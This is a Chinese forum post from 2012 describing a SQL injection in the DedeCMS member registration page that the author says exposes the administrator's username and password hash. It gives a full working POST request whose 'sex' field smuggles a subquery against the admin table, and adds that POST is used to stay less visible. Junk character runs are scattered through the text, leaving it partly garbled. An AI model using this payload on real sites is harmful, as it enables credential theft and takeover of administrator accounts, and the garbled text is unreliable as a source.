dedecms版本 201211225 d; e' B% Z, _. F
2 z2 E5 Y: Q- ?3 E: R2 Y需要magic_quotes_gpc=Off% W8 y: C& U% m# K+ G2 N8 x3 _$ K
' u( R$ ?( x- |% B& F0 t, Z2 _应该是没有什么大危害的漏洞.) O* f f2 ]& R
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
( i0 R9 {3 E! J; p8 o
0 @. g: c( `$ L2 x是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的." _2 _. @5 ~+ ^% H8 H
POST提交以下数据,其实不用POST提交的,这样隐蔽点.$ M: K" G2 @* M1 l
9 Q' y% S4 f8 M Uhttp:///de/member/reg_new.php U" g3 f8 @$ p
+ m* l# r+ }2 I( g7 T+ p- r; n" ZPOST
" O0 P7 M/ u6 P3 P0 J8 [! ]3 I3 K& X) j4 Y" N3 n; t
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=, g* |2 k1 U8 K+ j" G8 t6 t
+ k7 v. V: h# f, V' J9 Y+ r* b成功注册后,头像处里面有好玩的信息.0 z. `5 q' B* g
. I; _* a" p1 N; Z. |+ k, @; D |
发表于 2012-12-5 10:03:32
收藏
支持
反对